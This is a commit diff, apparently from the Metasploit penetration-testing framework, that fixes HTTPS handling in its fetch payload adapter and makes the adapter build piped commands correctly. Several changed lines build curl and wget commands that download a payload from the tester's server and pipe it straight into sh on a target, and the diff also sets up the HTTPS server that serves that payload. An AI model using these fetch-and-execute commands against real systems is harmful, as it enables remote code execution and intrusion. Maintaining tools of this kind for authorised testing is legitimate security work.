Fix some https bugs and generate non-piped commands properly

Author: bwatters-r7

lib/msf/core/payload/adapter/fetch.rb

@@ -87,14 +87,10 @@ def generate(opts = {})
     opts[:code] = super
     @srvexe = generate_payload_exe(opts)
     if datastore['FETCH_PIPE']
-      @pipe_cmd = '(' + generate_fetch_commands + ')'
-      vprint_status(@pipe_cmd)
+      @pipe_cmd = generate_fetch_commands
+      vprint_status("Command served: #{@pipe_cmd}")
       cmd = generate_pipe_command
-      if datastore['FETCH_FILELESS']
-        cmd << 'bash'
-      else
-        cmd << 'sh'
-      end    else
+    else
       cmd = generate_fetch_commands
     end
     vprint_status("Command to run on remote host: #{cmd}")
@@ -313,11 +309,11 @@ def _generate_curl_command
   def _generate_curl_pipe
     case fetch_protocol
     when 'HTTP'
-      pipe_cmd = "curl -s http://#{_download_pipe} | "
+      return "curl -s http://#{_download_pipe} | sh"
     when 'HTTPS'
-      pipe_cmd = "curl -sk https://#{_download_pipe} | "
+      return "curl -sk https://#{_download_pipe} | sh"
     when 'TFTP'
-      pipe_cmd = "curl -s tftp://#{_download_pipe} | "
+      return "curl -s tftp://#{_download_pipe} | sh"
     else
       fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
     end
@@ -387,9 +383,9 @@ def _generate_wget_command
   def _generate_wget_pipe
     case fetch_protocol
     when 'HTTPS'
-      return "wget --no-check-certificate -qO - https://#{_download_pipe} | "
+      return "wget --no-check-certificate -qO - https://#{_download_pipe} | sh"
     when 'HTTP'
-      return "wget -qO - http://#{_download_pipe} | "
+      return "wget -qO - http://#{_download_pipe} | sh"
     else
       return nil
     end

lib/msf/core/payload/adapter/fetch/https.rb

@@ -11,16 +11,23 @@ def initialize(*args)
 
   def cleanup_handler
     if @fetch_service
-      cleanup_http_fetch_service(@fetch_service, @delete_resource)
+      cleanup_http_fetch_service(@fetch_service, @myresources)
       @fetch_service = nil
     end
 
     super
   end
 
   def setup_handler
-    @fetch_service = start_https_fetch_handler(srvname, @srvexe) unless datastore['FetchHandlerDisable']
+    unless datastore['FetchHandlerDisable']
+      @fetch_service = start_https_fetch_handler(srvname) unless datastore['FetchHandlerDisable']
+      escaped_uri = ('/' + srvuri).gsub('//', '/')
+      add_resource(@fetch_service, escaped_uri, @srvexe)
+      unless @pipe_uri.nil?
+        uri = ('/' + @pipe_uri).gsub('//', '/')
+        add_resource(@fetch_service, uri, @pipe_cmd)
+      end
+    end
     super
   end
-
 end

lib/msf/core/payload/adapter/fetch/server/https.rb

@@ -42,7 +42,7 @@ def ssl_version
     datastore['FetchSSLVersion']
   end
 
-  def start_https_fetch_handler(srvname, srvexe)
-    start_http_fetch_handler(srvname, srvexe, true, ssl_cert, ssl_compression, ssl_cipher, ssl_version)
+  def start_https_fetch_handler(srvname)
+    start_http_fetch_handler(srvname, true, ssl_cert, ssl_compression, ssl_cipher, ssl_version)
   end
 end

modules/payloads/adapters/cmd/windows/smb/x64.rb

@@ -20,7 +20,7 @@ def initialize(info = {})
         'AdaptedPlatform' => 'win'
       )
     )
-    deregister_options('FETCH_DELETE', 'FETCH_SRVPORT', 'FETCH_WRITABLE_DIR')
+    deregister_options('FETCH_DELETE', 'FETCH_SRVPORT', 'FETCH_WRITABLE_DIR', 'FETCH_FILENAME')
   end
 
   def srvport